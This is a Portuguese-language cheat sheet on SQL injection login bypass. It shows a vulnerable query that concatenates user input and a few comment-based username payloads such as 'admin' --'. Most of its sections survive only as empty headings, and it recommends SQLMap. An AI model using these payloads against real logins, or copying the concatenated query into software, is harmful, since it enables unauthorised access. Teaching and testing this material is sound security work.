SQL Injection - Authentication Bypass Cheat Sheet
📍 Estrutura típica de uma query de autenticação vulnerável
SELECT * FROM users WHERE username = '$user' AND password = '$pass';🔐 Payloads básicos de autenticação
Tipo
Payload
🔍 Exemplos por campo
🧑 Usuário (username)
admin' --
admin' #
admin'/*🔑 Senha (password)
📌 Payloads mais complexos
🧪 Testes úteis
Objetivo
Payload
🔂 Variantes usando UNION ou subselects
🧼 Observações
🧠 Recomendações de uso
🧪 Dica extra: automatize com SQLMap
Atualizado